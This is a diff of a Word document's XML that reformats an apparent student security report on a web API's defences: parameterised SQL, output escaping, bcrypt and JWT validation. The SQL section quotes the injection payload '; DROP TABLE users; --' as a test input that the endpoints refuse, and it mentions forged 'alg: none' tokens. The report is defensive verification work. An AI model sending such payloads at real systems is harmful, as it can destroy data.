       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1363,16 +1447,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: terminal running scripts/live_demo.ps1 – steps 1, 3, 4 visible]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: terminal running scripts/live_demo.ps1 – steps 1, 3, 4 visible</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1404,27 +1485,14 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>All database access goes through parameterised statements. The query text and</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>the values are sent separately, so a value can never be parsed as SQL syntax.</w:t>
+        <w:t>All database access goes through parameterised statements. The query text and the values are sent separately, so a value can never be parsed as SQL syntax.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1450,7 +1518,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1525,7 +1593,22 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> term is bound *and* its </w:t>
+        <w:t xml:space="preserve"> term is bound </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> its </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1553,20 +1636,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> wildcards are escaped</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> wildcards are escaped (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1613,7 +1683,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1642,7 +1712,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1684,14 +1754,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
@@ -1713,31 +1777,12 @@
         </w:rPr>
         <w:t>'; DROP TABLE users; --</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>against both the login and the search endpoint: all are refused or return zero</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>rows, and the table still exists afterwards.</w:t>
+        <w:t xml:space="preserve"> against both the login and the search endpoint: all are refused or return zero rows, and the table still exists afterwards.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1756,81 +1801,57 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>The API answers with JSON, which is *not* automatically XSS-safe — clients put</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">The API answers with JSON, which is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>not</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>the JSON into the DOM. Therefore every string is HTML-escaped on the way out</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve"> automatically XSS-safe — clients put the JSON into the DOM. Therefore every string is HTML-escaped on the way out (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>escape_deep</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> in </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>escape_deep</w:t>
+        <w:t>app/security.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>app/security.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>), and the response carries hardening</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>headers:</w:t>
+        <w:t>), and the response carries hardening headers:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1856,7 +1877,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1885,7 +1906,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1920,20 +1941,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> reaches the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>client as markup.</w:t>
+        <w:t xml:space="preserve"> reaches the client as markup.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1967,46 +1975,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> — bcrypt with a per-password random salt and cost factor</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>12. Two users with the same password get different hashes; a stolen database</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>cannot be turned into passwords cheaply. SHA-256 would be useless here: it is</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>fast by design, so a GPU tests billions of candidates per second.</w:t>
+        <w:t xml:space="preserve"> — bcrypt with a per-password random salt and cost factor 12. Two users with the same password get different hashes; a stolen database cannot be turned into passwords cheaply. SHA-256 would be useless here: it is fast by design, so a GPU tests billions of candidates per second.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2097,14 +2066,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
@@ -2145,47 +2108,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>. The signing secret comes from the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t>. The signing secret comes from the environment (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>JWT_SECRET</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>environment (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>JWT_SECRET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>); if it is absent, a random one is generated at</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>start-up, so no default secret can ever ship.</w:t>
+        <w:t>); if it is absent, a random one is generated at start-up, so no default secret can ever ship.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2220,68 +2157,70 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checks the header shape, decodes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve"> checks the header shape, decodes with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>algorithms=["HS256"]</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">with </w:t>
+        <w:t xml:space="preserve"> only (which rejects </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>algorithms=["HS256"]</w:t>
+        <w:t>alg: none</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> only (which rejects </w:t>
+        <w:t xml:space="preserve"> and algorithm-confusion forgeries), requires </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>alg: none</w:t>
+        <w:t>exp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> and</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>iat</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">algorithm-confusion forgeries), requires </w:t>
+        <w:t>/</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>exp</w:t>
+        <w:t>sub</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2295,49 +2234,15 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>iat</w:t>
+        <w:t>iss</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>sub</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>iss</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>, and then</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">, and then </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
@@ -2351,20 +2256,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>, so a deleted or downgraded account</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>cannot keep using an old token.</w:t>
+        <w:t>, so a deleted or downgraded account cannot keep using an old token.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2385,114 +2277,62 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> — an unknown username still costs one bcrypt</w:t>
+        <w:t xml:space="preserve"> — an unknown username still costs one bcrypt comparison (against a dummy hash) and returns exactly the same </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>401</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> body as a wrong password.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">comparison (against a dummy hash) and returns exactly the same </w:t>
+        <w:t xml:space="preserve">Verification: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>401</w:t>
+        <w:t>tests/test_api.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> body as a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve"> contains dedicated tests for a garbage token, an expired token, an </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>alg: none</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>wrong password.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Verification: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>tests/test_api.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> contains dedicated tests for a garbage token,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">an expired token, an </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>alg: none</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> token, and a token signed with a different key</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">— all four are rejected with </w:t>
+        <w:t xml:space="preserve"> token, and a token signed with a different key — all four are rejected with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2525,7 +2365,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2559,6 +2399,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2579,6 +2422,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2599,6 +2445,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2621,6 +2470,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2636,6 +2488,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2651,6 +2506,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2668,6 +2526,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2683,6 +2544,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2705,6 +2569,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2722,6 +2589,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2737,6 +2607,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2752,6 +2625,9 @@
             <w:tcW w:type="dxa" w:w="3118"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2768,7 +2644,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2803,33 +2679,27 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>,</w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>pytest-report</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>), which is what the assignment asks to screenshot.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>pytest-report</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>), which is what the assignment asks to screenshot.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2868,42 +2738,33 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: GitHub Actions – all three jobs green]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: GitHub Actions – all three jobs green</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
